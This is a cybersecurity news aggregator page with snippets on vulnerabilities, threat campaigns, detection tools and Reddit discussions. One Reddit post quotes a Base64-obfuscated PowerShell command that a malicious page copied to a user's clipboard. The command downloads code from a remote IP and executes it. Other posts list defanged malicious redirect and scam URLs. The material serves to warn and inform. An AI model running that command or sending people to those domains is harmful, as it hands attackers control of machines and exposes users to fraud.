Researchers found a flaw in Opera GX, the gaming-focused version of the Opera browser, that let a malicious website silently install a browser add-on and use it to lift specific data from the pages a victim visits. In a proof of concept, they reconstructed a signed-in user's full Gmail address from a single visit, with no click. Opera has patched the flaw and says it found no evidence that
Cybersecurity News and Vulnerability Aggregator
Cybersecurity news aggregator
treemd <(curl -sL https://allsec.sh/md) (as Markdown) Top Cybersecurity Stories Today
The North Korean threat actors linked to the Contagious Interview campaign have been observed publishing 108 unique packages and web browser extensions spanning npm, Packagist, Go, and Google Chrome as part of an ongoing activity referred to as PolinRider. "The campaign remains active, and new malicious packages are likely to continue appearing as threat actors compromise maintainer accounts,
The Federal Bureau of Investigation (FBI) said today it worked with industry partners to seize hundreds of domains associated with NetNut , a sprawling residential proxy service operated by the publicly-traded Israeli company Alarum Technologies [NASDAQ: ALAR]. The action comes roughly two weeks after KrebsOnSecurity published findings from multiple security firms connecting NetNut to the Popa botnet, a collection of at least two million devices that have been compromised by malicious software with little or no consent from victims. The NetNut homepage today was replaced by this seizure banner from the FBI. On June 19, three different security firms issued similar findings : That NetNut is a residential proxy network which populates a botnet called Popa, and distributes software for devices commonly found in homes, such as smart TVs and streaming boxes. NetNut’s software turns those systems into always-on residential proxy nodes that are rented to others, who predominantly use them to relay abusive and intrusive Internet traffic, such as mass content scraping, advertising fraud, and account takeover activity.
Latest
[https://medium.com/@souzo/making-a-wazuh-server-in-python-from-scratch-for-fun-and-maybe-profit-c3ac6758756f](https://medium.com/@souzo/making-a-wazuh-server-in-python-from-scratch-for-fun-and-maybe-profit-c3ac6758756f)
Overview In the first installment of this series , I walked through how I leveraged large language models to assist in identifying several vulnerabilities in the FreeBSD kernel, including a stack-based buffer overflow assigned CVE-2026-3038 . This raised a natural follow-up question. Can language models effectively write exploits for memory corruption vulnerabilities? This article explores that question. I’ll detail two exploit chains I developed that achieve a full escape from a FreeBSD jail environment. The first chain pairs a stack-based buffer overflow with a stack-based information leak to defeat both stack canaries and KASLR. The second takes a different path, combining a heap-based buf
In our general reporting under TOP 150 ports (2nd section) [https://github.com/sky-poppy/fwfeed/blob/main/blocklist\_honeypot\_firewall\_stats.txt](https://github.com/sky-poppy/fwfeed/blob/main/blocklist_honeypot_firewall_stats.txt) I have observed some random high up ports being specifically asked by a minority of connections. The country is not important as obviously a DC source typically but what vendor/software are these listening ports associated with? As its limited in source connections and very specific high port numbers, there is more than port scanning going on here so I would see this as hunting for something like... * Building management software? * Controllers of sorts ie power, fire? (ie honeywell or similar) * C&C compromised host listening ports? * Torrent software, maybe a zero day in client software? 44697 China 45330 China 43373 China United States 45417 China 42944 China United States 44090 China United States 43113 China United States 42781 China United Kingdom 44789 China 45232 China 43401 China United States Ideas for listening vendor ports?
It wasn't that too long ago when I wrote here about Harvard being compromised - [https://www.reddit.com/r/cybersecurity/comments/1tkncvz/harvard\_and\_140\_other\_legitimate\_websites/](https://www.reddit.com/r/cybersecurity/comments/1tkncvz/harvard_and_140_other_legitimate_websites/) This time it redirects to a hazel-palm-cliff\[.\]pages\[.\]dev/help/?35151776230997 that eventually leads to a site that wants you to enable notifications with extensive tracking in the URL query. This time with Russian notes: // Целевой URL для редиректа -> // Target URL for redirect // Выполняем редирект на целевой URL -> // Perform a redirect to the target URL // Альтернативный вариант (сохраняет историю браузера): -> // Alternative option (preserves browser history): Images are available on my X post if you are interested -> [https://x.com/rifteyy/status/2074214854303654264](https://x.com/rifteyy/status/2074214854303654264) and whole redirect in action at [https://app.any.run/tasks/893eef05-f43d-4de0-a10e-1f3a76270304](https://app.any.run/tasks/893eef05-f43d-4de0-a10e-1f3a76270304) By searching the campaign name `hotejmain` on threat intelligence tools (ANY.RUN TI, Shodan, Censys), you can find more compromised websites that are relevant to this redirection campaign, such examples are: * dmspharma\[.\]com * ttm-medical-logistics\[.\]de * arxis\[.\]eu * baufoerderung\[.\]de * bmservice\[.\]nl * hodgsonphysio\[.\]co\[.\]uk Few of the URL's that would love you to enable browser notifications: * hxxps://vexaluno\[.\]vexaluno\[.\]shop/?utm\_medium=9eb2bcdc89976429bc64127056a4a9d5d3a2b57a&utm\_campaign=HotejMain&1=11005&cid=11005-14814-20260416103042b28c * hxxps://tavqeril\[.\]tavqeril\[.\]shop/?utm\_medium=9eb2bcdc89976429bc64127056a4a9d5d3a2b57a&utm\_campaign=HotejMain&1=346&cid=346-0-202604132346259ceb368bd0 * hxxps://zelmoriax\[.\]zelmoriax\[.\]shop/?utm\_medium=9eb2bcdc89976429bc64127056a4a9d5d3a2b57a&utm\_campaign=HotejMain&1=346&cid=346-0-20260421171506e809e6cfee * hxxps://kavontrix\[.\]kavontrix\[.\]shop/?utm\_medium=9eb2bcdc89976429bc64127056a4a9d5d3a2b57a&utm\_campaign=HotejMain&1=346&cid=346-0-20260425212701a89df87b23 * hxxps://pelnoriva\[.\]pelnoriva\[.\]shop/?utm\_medium=9eb2bcdc89976429bc64127056a4a9d5d3a2b57a&utm\_campaign=HotejMain&1=346&cid=346-0-20260501111413de4ce9f9e4 * hxxps://talvexoni\[.\]talvexoni\[.\]shop/?utm\_medium=9eb2bcdc89976429bc64127056a4a9d5d3a2b57a&utm\_campaign=HotejMain&1=346&cid=346-0-20260509135905390a114882 * hxxps://tavronixe\[.\]tavronixe\[.\]shop/?utm\_medium=9eb2bcdc89976429bc64127056a4a9d5d3a2b57a&utm\_campaign=HotejMain&1=346&cid=346-0-20260512211922ef6f36eb47 * hxxps://nra5toveli\[.\]nra5toveli\[.\]cfd/?utm\_medium=9eb2bcdc89976429bc64127056a4a9d5d3a2b57a&utm\_campaign=HotejMain&1=11569&cid=11569-15854-20260609190219c50e
Overview Several versions of Tenda firmware contain an undocumented authentication backdoor that grants administrative access to the devices' web management interfaces. An attacker can expoit this vulnerability, tracked as CVE-2026-11405, to bypass the password verification process and obtain full administrative control without valid credentials. Affected Versions: * US_FH1201V1.0BR_V1.2.0.14(408)_EN_TD * US_W15EV1.0br_V15.11.0.5(1068_1567_841)_EN_TDE * US_AC10V1.0re_V15.03.06.46_multi_TDE01 * US_AC5V1.0RTL_V15.03.06.48_multi_TDE01 * US_AC6V2.0RTL_V15.03.06.51_multi_T Description Tenda is a supplier of home and business network devices such as routers, switches, wireless access points, and video surveillance equipment. Most of these devices include web-based interfaces that allow users to perform configuration and management operations, which are protected by username/password authentication to prevent unauthorized modifications. The web server binary /bin/httpd contains an undocumented backdoor authentication mechanism in the login() function. Initially, the function follows a normal authentication path using MD5-based password verification. However, if authentication fails, the function invokes GetValue("sys.rzadmin.password") to retrieve an alternate password value from the device configuration. It then performs a direct strcmp() comparison in plaintext between the user-supplied password and the configuration-stored value. A successful match grants role=2 admin-level access and creates a valid session. The associated username is not validated, so any provided username will succeed when paired with the backdoor password. This backdo
An Iranian hacking group affiliated with Iran's Ministry of Intelligence and Security (MOIS) has been wielding a previously undocumented modular command-and-control (C2) framework dubbed Cavern (aka Cav3rn) targeting Israeli organizations. The activity, which has primarily singled out IT providers and government sectors, has been attributed to a threat cluster tracked by Check Point Research
Hola a todos,>!​!< He notado que hay mucha confusión entre los términos SASE, SSE y ZTNA, especialmente con cómo se integran en la arquitectura de red moderna. He creado un video explicando de forma sencilla pero técnica, las diferencias clave y por qué estos conceptos están cambiando la ciberseguridad. Me encantaría saber qué opinan o si tienen alguna duda sobre cómo implementarlos. ¡Espero que les sirva! >!<>!​!<
Overview HP Printers in the Deskjet 2800 Series running firmware version <=TBP1CN2612AR contain a missing authorization vulnerability tracked as CVE-2026-13753 . This vulnerability allows unauthenticated access to the printer's webserver API endpoints, exposing Wi-Fi credentials, management configuration details, and sensitive security data normally restricted to administrative users. Description Modern HP printers provide a web-based management interface for configuring content such as Wi-Fi Direct settings, SNMP management access, and device security options. When accessed normally through the browser interface, these pages explicitly require administrator credentials before sensitive information is displayed. This information is protected because, for example, Wi-Fi Direct controls the printer's direct wireless connectivity, and SNMP configuration settings can reveal detailed information about the device's monitoring and management controls. In affected firmware versions, the authorization requirement can be bypassed by sending direct, unauthenticated GET requests to multiple backend API endpoints. The affected endpoints return administrative configuration data without validating session state or authentication, including the Wi-Fi Direct SSID and plaintext passphrase, unique printer serial numbers and service IDs, and details about the device's administrative password state. This information is freely disclosed even though the corresponding web interface pages correctly enforce authentication, indicating an authorization flaw in the API layer. Impact A remote attacker with network access to the printer can bypass the web interface's authentication requirements and retrieve sensitive configuration data directly fr
A use-after-free bug in Linux's KVM hypervisor can be triggered from a guest virtual machine to corrupt the shadow-page state of the host kernel that runs it. Dubbed 'Januscape' and tracked as CVE-2026-53359, the flaw sits in the shadow MMU code that KVM shares across both Intel and AMD. The public proof-of-concept panics the host; the researcher claims that a separate, unreleased exploit
Safer-dependencies: A toolkit for claude code to ensure dependencies used aren't vuln, don't use abandoned packages, implement cooldown to avoid supply chain attacks, etc...
I built **safer-dependencies**, a security layer for Claude Code that checks packages before AI coding assistants add them to a project. I originally built this for my own workflow, but I’m sharing it publicly in case it’s useful to others using Claude Code. It runs dependency safety checks for things like known CVEs, typo-squatting, abandoned packages, stale releases, package age/cooldown windows, and PyPI hash-pin integrity. It currently supports npm, PyPI, RubyGems, Maven, Go, and Rust. Open source to help others. GitHub: [https://github.com/robert-auger/safer-dependencies](https://github.com/robert-auger/safer-dependencies)
Threat actors have been observed attempting to exploit a recently patched critical security flaw in Gitea Docker images, according to Sysdig. The vulnerability in question is CVE-2026-20896 (CVSS score: 9.8), a vulnerability that stems from the DevOps platform trusting the "X-WEBAUTH-USER" header from any source IP address, effectively allowing an unauthenticated internet client to get elevated
New OST2 class: "Architecture 1901: From zero to QEMU - A Gentle introduction to emulators from the ground up!"
This free class by Antonio Nappa of Fuzz Society builds up your knowledge from learning a toy 8-bit CPU architecture all the way to understanding how QEMU can emulate that architecture. Using this knowledge you can then understand how QEMU can emulate any architecture! Based on beta testing, this class takes an average of 8h47m to complete, and a median of 7h26m.
Reviewing some SIEM logs and I saw some hits sourcing from this entity: [https://www.shadowserver.org/](https://www.shadowserver.org/) Digging into it, it appears it may have some value to me, but I know not of its: a) legitamacy b) Accuracy c) Coverage overlap between itself and say.. CISA external scan reports. Thoughts?
Is it because of the Iran war or something? Just as I finish patching one system, a new advisory gets released lol Few days ago the Catalyst Center CVE got dumped on our heads like wtf [https://vulnipulse.com/advisories/cisco-cisco-sa-catc-file-read-wlh2vf8x](https://vulnipulse.com/advisories/cisco-cisco-sa-catc-file-read-wlh2vf8x)
Free detection library: production-validated rules across KQL, Sigma, Splunk, Athena, PowerShell, Velociraptor, YARA, Suricata, osquery, each with false positives and tuning notes
Most detection-rule repos give you a query and nothing else, so you deploy it, drown in false positives, and rip it out. I've been building a library that documents what a rule actually needs to survive contact with production. Every detection includes: the query, the specific attacker behavior it triggers on, the legitimate activity that causes false positives and how to distinguish it, tuning thresholds and exclusions, and validation steps to test it before you rely on it. Everything's mapped to ATT&CK tactics. It spans nine platforms: Sentinel/Defender KQL, vendor-agnostic Sigma, Splunk SPL, AWS Athena, PowerShell, Velociraptor VQL, YARA, Suricata, and osquery, so it's useful whatever stack you run. Apache-2.0, free, no signup. Repo: [github.com/ridgelinecyberdefence/Enterprise-Detection-Engineering](http://github.com/ridgelinecyberdefence/Enterprise-Detection-Engineering) It's early, and I'm actively adding to it. After feedback from people running detections in production: what's missing, which false-positive guidance is wrong for your environment, what platforms you'd want covered.
A streaming box should not need a threat model. Neither should a username field, a demo repo, a reset flow, or a browser permission prompt. That is the irritating part this week: the risky pieces were ordinary. Home devices became a routing cover. Clean code pulled dirt from a dependency. Identity shortcuts aged badly. AI systems trusted the wrong instructions. Same soft spot throughout: trust
How to Evaluate an AI SOC Platform in 2026: 6 Capabilities That Separate Leaders from Bolt-On AI solutions
Building a shortlist for an AI SOC evaluation can be tough. SIEM, SOAR, and pureplay AI SOC vendors are all saying the same thing. But behind the identical label sit very different products, from chat assistants bolted onto a legacy SIEM to agent platforms that run detection, triage, investigation, and response on their own data foundation. Whether a platform will materially change outcomes for
A suspected China-nexus threat activity cluster has been observed targeting Indian taxpayers, tax professionals, and corporate finance teams to deliver a remote access trojan designed to steal sensitive data from compromised hosts. The multi-stage campaign, codenamed Operation DragonReturn by Seqrite Labs, involves sending spear-phishing emails impersonating the Income Tax Department of India.
[https://www.security.com/threat-intelligence/byovd-vulnerable-drivers](https://www.security.com/threat-intelligence/byovd-vulnerable-drivers)
The Office of Professional Responsibility has opened more than 100 cases over what ICE officials call “incidents of doxing and threats” against ICE employees.
Porting the functionality of dnscmd.exe into (slightly) more OPSEC safe Beacon Object Files (BOFs) so you can get domain admin rights when you manage to impersonate a user that is a member of the DnsAdmins group, or if using dnscmd.exe simply isn’t an option.
Researchers at Shandong University have shown a fast new way to pull data off computers that are cut off from every network. The technique, called TrojPix, tweaks on-screen pixels in ways the eye cannot see, so that the video cable carrying them radiates a faint radio signal a nearby receiver can decode. But TrojPix works only once malware is already on the target machine, so it
Cybersecurity researchers have flagged a novel Java-based remote access trojan (RAT) called QuimaRAT that's capable of targeting Windows, Linux, and macOS environments. According to LevelBlue, the cross-platform malware is advertised under a malware-as-a-service (MaaS) model, costing anywhere between $150 for one month to $1,200 for lifetime access. Other subscription tiers include $300 for
Researchers found a flaw in Opera GX, the gaming-focused version of the Opera browser, that let a malicious website silently install a browser add-on and use it to lift specific data from the pages a victim visits. In a proof of concept, they reconstructed a signed-in user's full Gmail address from a single visit, with no click. Opera has patched the flaw and says it found no evidence that
To reduce the amount of noise from questions, we have disabled self-posts in favor of a unified questions thread every week. Feel free to ask any question about reverse engineering here. If your question is about how to use a specific tool, or is specific to some particular target, you will have better luck on the [Reverse Engineering StackExchange](http://reverseengineering.stackexchange.com/). See also /r/AskReverseEngineering.
Scanners meant to catch malicious add-on "skills" for AI coding agents can be fooled by a few simple changes that leave the malware working, according to a new study from researchers at the Hong Kong University of Science and Technology. Their strongest trick slipped past every scanner tested more than 90% of the time, and the same team built a runtime checker that catches most of the
https://preview.redd.it/xfm8scpfyjbh1.png?width=1240&format=png&auto=webp&s=cc1fc0bbeaca4dfd7aee75951f8ec61070e262bf Sharing some lessons from a challenging forensic PCAP analysis: 1. Map the C2 protocol first. Understanding how the attacker communicates tells you what to expect in every packet. 2. Encryption keys aren't always what they look like. A hex string can be interpreted multiple ways — raw bytes, UTF‑8 encoding, even UTF‑16. If your decrypted output is garbage, ask yourself whether you're using the right form of the key. 3. Responses matter as much as requests. In encrypted C2 channels, the server sends back just as much intel as the attacker sends up. 4. Gzip inside base64 inside C# inside AES. It sounds absurd, but nesting is a real obfuscation pattern. 5. Check file‑creation side effects. Sometimes the payload writes a file you can use as a decryption key elsewhere. If you're getting into forensics CTFs, grab a PCAP with at least 4k packets and try to reconstruct the full timeline — it's a different beast from Jeopardy‑style challenges.
This post continues and concludes our series on Agent ID, by outlining steps that an administrator or security team can take to secure blueprints and agent identities created in their local Entra ID tenant.
I built a read-only tool for finding SIEM detections that are silently blind. Looking for Sentinel input.
I’ve been working on a small open-source tool called [`deadair`](https://github.com/Big-Comfy/deadair) after running into a detection engineering problem that I don’t think normal rule-health checks cover well. Repo: [https://github.com/Big-Comfy/deadair](https://github.com/Big-Comfy/deadair) Release: [https://github.com/Big-Comfy/deadair/releases/tag/v0.3.4](https://github.com/Big-Comfy/deadair/releases/tag/v0.3.4) Most SIEMs can tell you whether a rule ran. That’s useful, but it doesn’t always tell you whether the rule still had the data it expected when it ran. A rule can be enabled, scheduled, green in the UI, and still be effectively blind because the log source stopped shipping, the index pattern matches nothing in this environment, a parser upgrade removed a field, or a batch-fed source is arriving after the lookback window has already passed. `deadair` tries to check that other half. It maps enabled detections to the telemetry they depend on, then reports dead rules, impaired rules, stale/empty sources, unused telemetry, and the blast radius of a source going quiet. Right now it supports Elastic Security 8.x and OpenSearch Security Analytics 2.x. I want to add Microsoft Sentinel next. To do that properly, I need access to a real Sentinel tenant or a partner willing to test with one. Docs and synthetic fixtures will not be enough because the hard parts are real-world KQL, functions, ASIM parsers, watchlists, custom tables, cross-workspace queries, and permission boundaries. If this sounds useful, I’d appreciate feedback or a DM. Blunt “this won’t work because…” feedback is useful too.
A U.S. government entity paid about $1 million to keep stolen files from being leaked, according to a new case study by Rakesh Krishnan for Ransom-ISAC, built on a leaked negotiation chat and the blockchain trail the payment left. The odd part: the group that took the money calls itself Kairos, but it may not be a ransomware gang at all. Krishnan found no sign that it ever locked a single
The North Korean threat actors linked to the Contagious Interview campaign have been observed publishing 108 unique packages and web browser extensions spanning npm, Packagist, Go, and Google Chrome as part of an ongoing activity referred to as PolinRider. "The campaign remains active, and new malicious packages are likely to continue appearing as threat actors compromise maintainer accounts,
Plus: Alleged Scattered Spider hacking member extradited, dozens of license plate reader errors, and Indian officials are concerned about WhatsApp’s username rollout.
https://be nrankwhence.com/preland/av/mc-af/6/index.html? Space added to make the link invalid. 0/10, don't recommend navigating to that website.
Security firm runZero has disclosed seven vulnerabilities in FatFs, a small filesystem library that lets a device read and write the FAT and exFAT formats used on USB drives and SD cards. The flaws matter because FatFs is nearly everywhere. It ships inside the firmware that runs security cameras, drones, industrial controllers, hardware crypto wallets, and other devices built on
A newly disclosed Linux kernel flaw called Bad Epoll (CVE-2026-46242) lets an ordinary user with no special access take full control of a machine as root. It affects Linux desktops, servers, and Android, and a fix is out. Bad Epoll sits in the same small stretch of kernel code where Anthropic's most powerful AI model, Mythos, recently found a different bug. The AI caught one flaw and missed
Cybersecurity researchers have discovered a previously undocumented modular malware framework codenamed Avalon that's distributed by means of a multi-stage phishing chain capable of bypassing traditional security controls. Avalon combines credential collection, lateral movement, remote access, recovery disruption, and ransomware execution, bringing together diverse functions under one
[they are getting smarter](https://preview.redd.it/d40lwwsmv1bh1.png?width=1407&format=png&auto=webp&s=deb513ded2423277ed3a8437e1d3763dc138d62c) this is what the script copied to my clipboard. funny that this website was opened for the first time, yet chrome gave it clipboard permission. lol iex(\[Text.Encoding\]::ASCII.GetString(\[Convert\]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgJ2h0dHA6Ly8xNjYuMS44OS45MS9fLycgLVVzZUJhc2ljUGFyc2luZyB8IEludm9rZS1FeHByZXNzaW9u')))
Most breaches don’t start with a vulnerability nobody knew about. They start with one nobody patched in time. Vulnerability exploitation is now the single biggest way attackers get into a network. It has overtaken stolen credentials for the first time in the 19-year history of Verizon’s Data Breach Investigations Report, with 31% of breaches now […] The post How to scale your patches without scaling your team (the patch wave) appeared first on Heimdal Security Blog .
A previously undocumented threat actor known as Armored Likho has been attributed to cyber attacks targeting government agencies and the electric power sector across Russia, Brazil, and Kazakhstan. "Armored Likho blends financially motivated campaigns targeting private individuals with targeted cyber espionage aimed at organizations," Kaspersky said in a technical analysis published today. "
Claude Mythos, an AI model from Anthropic, has found 23,019 software vulnerabilities in the past month. Fewer than 1% of them have been patched. That gap is the story. Finding a vulnerability used to be the hard part, the thing that limited how fast software got fixed. AI just closed that gap to almost nothing. […] The post AI didn’t break patching. It showed us patching was already broken. appeared first on Heimdal Security Blog .
A new report from the Citizen Lab has revealed that former Member of the European Parliament Stelios Kouloglou had his mobile device repeatedly hacked with the notorious Pegasus spyware while serving on a committee that was tasked with investigating the abuse of such commercial surveillance tools in the bloc. "Through forensic analysis of his device, we found that the attackers could have had
I have turned on my mac in the morning and got this message? Facts or Cap? https://preview.redd.it/kb4sv0aewyah1.png?width=1156&format=png&auto=webp&s=c1db885a6f856d112f9bb3918583af5c51a4a64a
Presently sponsored by: Report URI: Guarding you from rogue JavaScript! Don’t get pwned; get real-time alerts & prevent breaches #SecureYourSite I can't recall if someone else originally came up with this saying or if I said it in some off-the-cuff comment and it just propagated, but since it's often attributed back to me , I'll relay it here regardless: Trying to delete yourself from the internet is like trying to take piss out of a swimming pool Depending on the publication, I'll tailor the saying to be either more broadly palatable or more, uh, "Australian", but the sentiment doesn't change: once data spreads on the internet, you can never put a lid on it. This is important in the context of data breaches because it speaks to the immutability of our exposed personal information. It also speaks to the limited practicality of services that promise to erase your data from the internet, and it's the constant outreach from these organisations looking for marketing opportunities on Have I Been Pwned (HIBP) that's prompted me to write this. Let's begin with those services, and because there are so many and I don't want to throw any of them under the bus, I won't name names. I also won't name them because whilst they're rather assertive in their marketing outreach, I do believe they're well-intentioned and I don't want to imply otherwise. And they have a role to play; it's ju
“It is a direct attack on the rule of law,” says one European Parliament member of the new findings from Citizen Lab.
The Federal Bureau of Investigation (FBI) said today it worked with industry partners to seize hundreds of domains associated with NetNut , a sprawling residential proxy service operated by the publicly-traded Israeli company Alarum Technologies [NASDAQ: ALAR]. The action comes roughly two weeks after KrebsOnSecurity published findings from multiple security firms connecting NetNut to the Popa botnet, a collection of at least two million devices that have been compromised by malicious software with little or no consent from victims. The NetNut homepage today was replaced by this seizure banner from the FBI. On June 19, three different security firms issued similar findings : That NetNut is a residential proxy network which populates a botnet called Popa, and distributes software for devices commonly found in homes, such as smart TVs and streaming boxes. NetNut’s software turns those systems into always-on residential proxy nodes that are rented to others, who predominantly use them to relay abusive and intrusive Internet traffic, such as mass content scraping, advertising fraud, and account takeover activity.
How we built a procedural engine that learns your real cloud environment, generates decoy environments indistinguishable from production, and converts every attacker interaction into signal. In the myth, Daedalus built the Labyrinth of Knossos so well that he nearly couldn’t escape it himself. The corridors looked real. The paths felt purposeful. And the deeper you went, the harder it became to tell which direction led out. That’s the design constraint we gave ourselves when building Knossos for Praetorian Guard: generate cloud infrastructure so realistic that an attacker who lands inside it doesn’t realize they’ve already lost. Every API call they make, every role they assume, every secret they pull from Parameter Store, all of it is being recorded, scored, and fed back into the system that built the trap. The idea isn’t new. Honeypots have existed for decades. But the gap between a traditional honeypot and what a competent attacker expects to find in a real AWS account is enormous. Drop a single canary token in an otherwise empty VPC and you’ve told the attacker two things: you’re running deception, and there’s nothing interesting here. They pivot, and you’ve burned your one shot. Knossos takes a fundamentally different approach. Rather than scattering individual lures and hoping someone trips
It’s 37oC, And All We Can Think About Is ColdFusion (Adobe ColdFusion Security Bulletin APSB26-68 CVE Bonanza)
We’re back, melting - we’ve tried shouting, screaming, and throwing things at the Sun, and it is just not working. Before we begin our analysis, we want to be clear - given the number of vulnerabilities fixed (and some not mentioned..), we’ve struggled to have confidence in our attribution of “vulnerability specific CVE ID”. We’ve performed some informed, uninformed, random guesses - but as usual, please resist the urge to send us emails explaining how awful/wrong we are. We know some of you can’t resist, so please rest assured that we do read them, print them, and frame our favorites each month. Like the individual who emailed us 5 times to tell us that they were older than Telnet. Given that Telnet is newer than SSH (which we replied to tell you (your follow-up emails were caught by our spam filter, sorry)), we knew you were lying to us. As always, watchTowr clients gain industry-first access to our research days before publication to validate their exposure, accompanied by Active Defense capabilities to autonomously mitigate exposure. This research is a glimpse into the capabilities that power our Preemptive Exposure Management solution and get organizations ahead of inevitable in-the-wild exploitation: the
VU#639124: Multiple local privilege escalation vulnerabilities in Little Orbits GameFirst Anti-Cheat
Overview The GamersFirst Anti-Cheat (GFAC) driver GFAC.sys contains multiple local privilege escalations and denial-of-service vulnerabilities stemming from insecure handling of user-controlled input through a minifilter communication port. A local attacker can abuse these flaws to perform arbitrary kernel memory writes, obtain privilege escalation to SYSTEM, or trigger a system crash. Description GFAC is a proprietary anti-cheat software developed by video game publisher Little Orbit. GFAC includes a kernel-mode driver, GFAC_Sys_x64.sys , that exposes privileged functionality to user-mode applications through a minifilter communication port. Although these low-level interfaces are necessary for the software's operation, vulnerabilities can arise if user-mode access is not properly restricted and validated. CVE-2026-12166 GFAC_Sys_x64.sys contains a NULL pointer dereference condition in its initialization and request handling logic. A local attacker can trigger the vulnerable code path, causing the driver to read or write to a memory address assigned as NULL. Successful exploitation results in a system crash (“blue screen of death”). CVE-2026-12167 The minifilter communication port that GFAC_Sys_x64.sys exposes does not enforce sufficiently restrictive security descriptors. As a result, low-privileged users can establish connections to the driver and access functions intended only for trusted processes. [RM1.1][MB1.2][RM1.3]User access to privileged functions could help an attacker take advantage of other weaknesses in the driver. CVE-2026-12168 GFAC_Sys_x64.sys processes messages received through a minifilter communication
We’re running Patch the Planet , an ongoing collaboration with OpenAI that pairs Trail of Bits engineers directly with more than 30 open-source projects. Its goal is to front-run a serious problem facing open-source maintainers: highly capable models like GPT-5.5-Cyber will soon create a firehose of bug reports, and OSS maintainers are already spread thin. Our plan is to point OpenAI’s latest models at real codebases, find the security bugs first, work with maintainers to patch them, and find ways to decrease the burden on maintainers in the long run. We’ll publish field reports like this one as the initiative progresses; follow along via the Patch the Planet tag. The expertise barrier that kept bespoke fuzzing campaigns out of reach for most attackers is gone. We watched GPT-5.5-Cyber build in a single day what would have taken weeks for a skilled security researcher : harnesses across a dozen entrypoints, sanitizer and variant builds, seeds, and multiple findings currently undergoing coordinated disclosure. This particular instance focused on zlib , a widely used data format and lossless data compression software library. We pointed GPT-5.5-Cyber at the library and drove it through Codex with the /goal command, asking it to find a specific class of bugs that are critically dangerous in compression libraries. We’ll publish the full harness and findings for inspection once the vulnerabilities are patched and a new release is cut. The lab GPT-5.5-Cyber built in a day We didn’t tell the model how to find these bugs. The obvious first move is to read the source code, but zlib
Introduction This blog post addresses the practical implications of Post-Quantum Cryptography (PQC). It examines why waiting for vendors is a high-risk strategy and why organizations must assume ownership of their own quantum-readiness efforts . It also introduces a more effective quantum-readiness playbook : a practical, risk-driven approach aimed at reducing exposure early, rather than relying on the commonly adopted inventory-first model. This is Part 2 of a two-part series and focuses on the practical implications of Post-Quantum Cryptography, including why organizations must take ownership of their own quantum-readiness journey and how a risk-driven approach can support
A researcher found that using Anthropic’s Claude Opus 4.7, he could break into the website of Front Gate—used by every festival from Lollapalooza to Bonnaroo—and freely issue any ticket he chose.
Heimdal Launches MSP Onboarding Wizard to Help Partners Onboard Microsoft CSP Customers in 2 Minutes
COPENHAGEN, Denmark, 1 July 2026 – Heimdal today announced the launch of MSP Onboarding Wizard, a new capability that helps managed service providers onboard Microsoft Cloud Solution Provider (CSP) customers inside the Heimdal platform faster and with less manual work. Built for MSPs managing multiple Microsoft tenants, MSP Onboarding Wizard reduces customer onboarding from around […] The post Heimdal Launches MSP Onboarding Wizard to Help Partners Onboard Microsoft CSP Customers in 2 Minutes appeared first on Heimdal Security Blog .
Sharing new scenarios and adaptations to play the Datadog expansion pack of Backdoors & Breaches.
Well, well, well - once again, the cat has dragged us in and spat us out. Today, we find ourselves questioning the reality we sit within. Must it be so predictable, and why us? “But watchTowr, what do you mean?” Well, if you’re here, you likely fit into one of the following categories: A dear reader, A group therapy accomplice A Groundhog Day fan club member Why? Because we once again find ourselves talking about Citrix NetScalers. Yes, that’s right, we’ve found another excuse to create memes and mock promise rings. For those that don’t start violently wretching when the phrase “Citrix NetScaler” is uttered, we have another word to whisper: “CitrixBleed”. As many know, the term CitrixBleed now refers to not a single vulnerability, but an entire class of Memory Disclosure-esque vulnerabilities in Citrix NetScaler devices, many of which have played roles in breaches and incidents in recent memory. For those new to this trauma, the following prior reading may be of interest: How Much More Must We Bleed? - Citrix NetScaler Memory Disclosure (CitrixBleed 2 CVE-2025-5777) Is It CitrixBleed4? Well, No. Is It Good? Also, No. (Citrix NetScaler Memory Leak & RXSS CVE-2025-12101)
Presently sponsored by: Report URI: Guarding you from rogue JavaScript! Don’t get pwned; get real-time alerts & prevent breaches #SecureYourSite How's the view?! Back to business, it's now 8 years ago that Scott and I thought it would be a cool idea to build Why no HTTPS? We used the site to shame companies for not implementing their transport later security property, and to make it a bit of fun, we shamed by country as well. This helped people jump on the bandwagon of giving their respective countries a little "encouragement", and we hope they'll do the same now with Why no Passkeys? Following my infamous phishing incident last year , I registered the domain with the intent of building the successor for the TLS version. However, due to a combination of me having no time and Scott getting very good with Claude Code, he's now stood up this project solo and done a wonderful job of it. Go and check it out, and give those big names from your country a little push.
“Continuous” has become the most stretched word in offensive security. This guide breaks down what continuous penetration testing means, why most of the market doesn’t deliver it, and how Synack’s Sara is bringing always-on, human-validated testing to the enterprise. The post Continuous Penetration Testing: What Security Leaders Need to Know appeared first on Synack .
https://mooofin.github.io/portfolio/blog/s4nct1m0ny.html tuts for ISF from kernel DWARF. for vol as well . loginwindow plaintext credential extraction, Chainbreaker 3DES keychain decryption, and full RE of a Swift dropper using machine Hardware UUID as decryption key , ive tried to make it very less jargon and reader friendly
Post-quantum cryptography is now one pip-install away for the entire Python ecosystem. With funding from the Sovereign Tech Agency , we implemented support for ML-KEM, the NIST-standard key-establishment primitive, and ML-DSA, the NIST-standard digital-signature primitive, in pyca/cryptography . On June 22, 2026, the White House ordered the U.S. government to accelerate its transition to post-quantum cryptography. The order says large-scale quantum computers, especially in adversarial hands, will threaten widely used cryptographic systems, and that attackers may already be collecting encrypted data now so they can decrypt it later. It also sets concrete migration deadlines: high-value and high-impact federal systems must use post-quantum key establishment by December 31, 2030 , and post-quantum digital signatures by December 31, 2031 . And even if you don’t care about quantum resistance, that’s not a problem because quantum resistance isn’t the main benefit of post-quantum crypto. That transition cannot happen only at the policy layer. Every application that signs packages, validates certificates, establishes secure channels, or protects long-lived secrets depends on cryptographic libraries. If those libraries do not expose post-quantum algorithms, the software stack cannot migrate. Almost every Python program that touches cryptography goes through pyca/cryptography . It’s currently the eleventh most-downloaded package on PyPI&l